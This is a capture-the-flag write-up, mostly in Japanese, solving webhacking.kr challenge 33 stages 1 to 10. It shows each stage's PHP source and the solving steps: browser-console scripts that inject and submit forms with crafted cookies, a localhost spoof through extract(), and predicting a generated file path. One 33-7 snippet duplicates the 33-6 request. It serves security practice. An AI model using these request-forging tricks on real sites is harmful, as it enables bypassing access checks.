33-1
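// Build a form that POSTs two fields (post=hehe, post2=hehe2) to lv2.php and
// append it to the current document. Run from the browser console on the
// challenge page so the request carries that page's session cookies.
// The field note stays out here as a JS comment: a `//` line placed inside the
// template literal is not a comment, it is rendered as text inside the form.
document.body.insertAdjacentHTML("beforeend", `
<form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/lv2.php" method="post">
  <input name="post" value="hehe" />
  <input name="post2" value="hehe2" />
</form>
`);

// Submit the form that was just injected.
document.getElementById("TEST_FORM").submit();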
33-2
GETパラメーターのキーをmyip
に設定。値はサーバーのREMOTE_ADDRであれば問題ない。
REMOTE_ADDR
の値は、次のコマンドで確認できる。
$> ping webhacking.kr PING webhacking.kr (202.182.106.159): 56 data bytes 64 bytes from 202.182.106.159: icmp_seq=0 ttl=52 time=13.164 ms 64 bytes from 202.182.106.159: icmp_seq=1 ttl=52 time=23.832 ms 64 bytes from 202.182.106.159: icmp_seq=2 ttl=52 time=46.848 ms 64 bytes from 202.182.106.159: icmp_seq=3 ttl=52 time=13.757 ms 64 bytes from 202.182.106.159: icmp_seq=4 ttl=52 time=48.526 ms ^C --- webhacking.kr ping statistics --- 5 packets transmitted, 5 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 13.164/29.225/48.526/15.552 ms
https://webhacking.kr/challenge/bonus-6/33.php?myip=202.182.106.159
これで正解と思ったが違った。
REMOTE_ADDR
は ユーザーがアクセスしているIPアドレス(サーバーから見た接続元アドレス)のことなので、 https://www.cman.jp/network/support/go_access.cgi
にアクセスし、IPアドレスを取得するのが良い。
↑の手順で正解
33-4
https://webhacking.kr/challenge/bonus-6/l4.php?password=b442e80a17388b2cd9e568da7ca315a1
Challenge 33-4 view-source hint : 1733041724
hintの値は1秒ごとに1つ増えていく。UNIXタイムスタンプをmd5でハッシュ化したものを、passwordに入れればOK
時間が近くなった時は、再読み込みボタンを連打するのがコツ。
33-5
<hr> Challenge 33-5<br> <a href=md555.txt>view-source</a> <hr> <?php
// Challenge source as published (stage 33-5).
// The gate only tests that three request values are truthy: one GET
// parameter, one POST field and one cookie. All three are chosen by the
// client, so the check says nothing about who the caller is; it is a
// request-crafting exercise, not an access control.
// A key that is absent raises an undefined-index notice (a warning on PHP 8)
// before the condition evaluates to false.
if($_GET['imget'] && $_POST['impost'] && $_COOKIE['imcookie']) echo "<a href=???>Next</a>";
else echo "Wrong";
?>
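// Cookie first: the 33-5 source reads `imcookie` from the request, so it has
// to exist before the form is submitted.
document.cookie = "imcookie=hello; path=/";

// Build the form. `imget` travels in the query string of the action URL and
// `impost` in the POST body, which covers the other two values the 33-5
// source tests. The field note is kept as a JS comment here: a `//` line
// inside the template literal would be rendered as text inside the form.
document.body.insertAdjacentHTML("beforeend", `
<form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/md555.php?imget=hello" method="post">
  <input name="impost" value="hello" />
</form>
`);

// Submit the form that was just injected.
document.getElementById("TEST_FORM").submit();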
33-6
<hr> Challenge 33-6<br> <a href=gpcc.txt>view-source</a> <hr> <?php
// Challenge source as published (stage 33-6).
// Both expected values are MD5 digests of data the client already knows:
// its own address as the server sees it (REMOTE_ADDR) and the User-Agent
// header it sends. Nothing in the comparison is secret.
// The comparisons use loose `==`. On hex digests that allows PHP type
// juggling (two numeric-looking strings such as "0e..." compare as numbers);
// production code should use `===` or hash_equals() instead.
if($_COOKIE['test'] == md5($_SERVER['REMOTE_ADDR']) && $_POST['kk'] == md5($_SERVER['HTTP_USER_AGENT'])) echo "<a href=???>Next</a>";
// The hint branch writes the User-Agent request header into the HTML
// response without escaping. That header is client-controlled, so real code
// would pass it through htmlspecialchars() before echoing it.
else echo "hint : {$_SERVER['HTTP_USER_AGENT']}";
?>
{
  // Request for stage 33-6, run from the browser console.
  // The 33-6 source compares cookie `test` with md5(REMOTE_ADDR) and POST
  // field `kk` with md5(User-Agent); the two hex strings below are presumably
  // those digests for the write-up author's own address and browser.
  const formMarkup = ` <form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/gpcc.php" method="post" > <input name="kk" value="0845b309c7b9b957afd9ecf775a4c21f" /> </form> `;

  // The cookie must be in place before the form is submitted.
  document.cookie = "test=13afe819710c524e52d5ba56fb781972; path=/";

  // Inject the form at the end of <body>, then submit it.
  document.body.insertAdjacentHTML("beforeend", formMarkup);
  const injectedForm = document.getElementById("TEST_FORM");
  injectedForm.submit();
}
33-7
https://webhacking.kr/challenge/bonus-6/wtff.php
119.171.161.124
119171161124
<hr> Challenge 33-7<br> <a href=wtff.txt>view-source</a> <hr> <?php
// Challenge source as published (stage 33-7).
// Overwrites the REMOTE_ADDR entry in $_SERVER with the same address minus
// its dots, so every later read sees the digit-only form.
$_SERVER['REMOTE_ADDR'] = str_replace(".","",$_SERVER['REMOTE_ADDR']);
// Passes when the request has a GET parameter whose name AND value both
// equal that digit string. Both are derived from the client's own address,
// which the client knows, so the check authenticates nothing.
// The comparison is loose (`==`).
if($_GET[$_SERVER['REMOTE_ADDR']] == $_SERVER['REMOTE_ADDR']) echo "<a href=???>Next</a>";
// The failure branch echoes the GET value back without escaping. That is
// request-controlled text written into HTML, so real code would escape it
// with htmlspecialchars().
else echo "Wrong<br>".$_GET[$_SERVER['REMOTE_ADDR']];
?>
?119171161124=119171161124
{
  // NOTE(review): this snippet posts to gpcc.php, the endpoint named in the
  // 33-6 source, and is character-for-character the 33-6 request. It looks
  // like a leftover paste under the 33-7 heading; confirm whether it belongs
  // here.
  const formMarkup = ` <form id="TEST_FORM" action="https://webhacking.kr/challenge/bonus-6/gpcc.php" method="post" > <input name="kk" value="0845b309c7b9b957afd9ecf775a4c21f" /> </form> `;

  // Set the `test` cookie before the form is submitted.
  document.cookie = "test=13afe819710c524e52d5ba56fb781972; path=/";

  // Inject the form at the end of <body>, then submit it.
  document.body.insertAdjacentHTML("beforeend", formMarkup);
  const injectedForm = document.getElementById("TEST_FORM");
  injectedForm.submit();
}
https://webhacking.kr/challenge/bonus-6/ipt.php?119171161124=119171161124
33-8
https://webhacking.kr/challenge/bonus-6/ipt.php
<hr> Challenge 33-8<br> <a href=ipt.txt>view-source</a> <hr> <?php
// Challenge source as published (stage 33-8).
// extract() copies every query-string parameter into a local variable of the
// same name, so the request itself can define $addr (or any other variable
// this script goes on to use).
extract($_GET);
// The real peer address is used only when no truthy `addr` parameter was
// sent; otherwise the request-supplied $addr from extract() is kept.
if(!$_GET['addr']) $addr = $_SERVER['REMOTE_ADDR'];
// The "local only" test therefore trusts a value the client can set.
// Defensive form: never extract() request arrays, and read
// $_SERVER['REMOTE_ADDR'] directly at the point of comparison.
if($addr == "127.0.0.1") echo "<a href=???>Next</a>";
else echo "Wrong";
?>
https://webhacking.kr/challenge/bonus-6/ipt.php?addr=127.0.0.1
33-9
<hr> Challenge 33-9<br> <a href=nextt.txt>view-source</a> <hr> <?php
// Challenge source as published (stage 33-9).
// Appends chr() of every second code from 97 up to 121 (123 would exceed the
// bound), which yields every other lowercase letter starting at 'a'.
// $answer is never initialised before the first `.=`, which raises an
// undefined-variable notice (a warning on PHP 8) on the first pass.
for($i=97;$i<=122;$i=$i+2){
    $answer.=chr($i);
}
// The expected value is fully determined by this published source, so it is
// not a secret. The comparison is loose (`==`).
if($_GET['ans'] == $answer) echo "<a href=???.php>Next</a>";
else echo "Wrong";
?>
これをphp online cmdで実行
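<!DOCTYPE html> <html> <body> <?php
// Offline re-run of the loop from the 33-9 source, printing the string the
// challenge compares against instead of checking a request parameter.
// $answer is initialised first so the first `.=` does not hit an undefined
// variable, and the echo statement is terminated explicitly.
$answer = '';
for ($i = 97; $i <= 122; $i += 2) {
    // Every second ASCII code from 97 ('a') upward; the last one used is 121.
    $answer .= chr($i);
}
echo $answer;
?> </body> </html>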
-> acegikmoqsuwy
33-10
<hr> Challenge 33-10<br> <a href=forfor.txt>view-source</a> <hr> <?php
// Challenge source as published (stage 33-10).
// Everything below is derived from the client's address alone.
$ip = $_SERVER['REMOTE_ADDR'];
// Replaces occurrences of the decimal text of $i with ord($i). $ip is
// reassigned on every pass, so the strlen() bound is re-evaluated against the
// growing string. Statement order matters here.
for($i=0;$i<=strlen($ip);$i++) $ip=str_replace($i,ord($i),$ip);
// Drop the dots, then keep the first 10 characters.
$ip=str_replace(".","",$ip);
$ip=substr($ip,0,10);
// Dead store: overwritten by the next line.
$answer = $ip*2;
// Division can produce a fractional value; its "." is stripped below.
$answer = $ip/2;
$answer = str_replace(".","",$answer);
// Creates a PHP file inside the served answerip/ directory. Its name is a
// deterministic function of the caller's address under a published
// transform, so the "hidden" path is predictable to that caller.
// fopen()'s result is not checked before fwrite()/fclose().
$f=fopen("answerip/{$answer}_{$ip}.php","w");
// The generated file includes the site config, calls solve(33) and deletes
// itself when it is requested.
fwrite($f,"<?php include \"../../../config.php\"; solve(33); unlink(__FILE__); ?>");
fclose($f);
?>
これを、php online editorで実行。
<!DOCTYPE html> <html> <body> <?php
// Offline re-run of the 33-10 transform with the write-up author's own
// address hard-coded in place of $_SERVER['REMOTE_ADDR']. The file-creation
// step of the challenge source is left out; the two derived values are
// printed instead.
$ip = "119.171.161.124";
// Same digit rewrite as the challenge source. The strlen() bound is
// re-evaluated as $ip grows.
for($i=0;$i<=strlen($ip);$i++) $ip=str_replace($i,ord($i),$ip);
$ip=str_replace(".","",$ip);
$ip=substr($ip,0,10);
// Dead store, kept to mirror the challenge source.
$answer = $ip*2;
$answer = $ip/2;
// Strip the "." left by a fractional result.
$answer = str_replace(".","",$answer);
// Prints $answer, a line break, then $ip: the two halves of the generated
// file name.
echo $answer;
echo "<br/>";
echo $ip;
?> </body> </html>
27553775535
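<hr> Challenge 33-10<br> <a href=forfor.txt>view-source</a> <hr> <?php
// Stage 33-10 challenge source, annotated by the write-up author with the
// values computed for their own address. Line breaks are restored here: with
// the listing collapsed onto one line, each trailing `#` note turns the
// statements after it into comment text.
$ip = $_SERVER['REMOTE_ADDR'];
// Digit rewrite. $ip is reassigned on every pass, so the strlen() bound moves
// as the string grows.
for($i=0;$i<=strlen($ip);$i++) $ip=str_replace($i,ord($i),$ip);
$ip=str_replace(".","",$ip);
$ip=substr($ip,0,10);
// Dead store: overwritten by the next line.
$answer = $ip*2;
$answer = $ip/2; # author's run: ip = 5510755107
$answer = str_replace(".","",$answer); # author's run: answer = 27553775535
// Creates a PHP file inside the served answerip/ directory. Its name is a
// deterministic function of the caller's address, so the path is predictable
// to that caller. fopen()'s result is not checked.
$f=fopen("answerip/{$answer}_{$ip}.php","w");
// The generated file includes the site config, calls solve(33) and deletes
// itself when it is requested.
fwrite($f,"<?php include \"../../../config.php\"; solve(33); unlink(__FILE__); ?>");
fclose($f);
?>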
answerip/27553775535_5510755107.php
-> 正解!
page:https://minegishirei.hatenablog.com/entry/2024/12/01/184813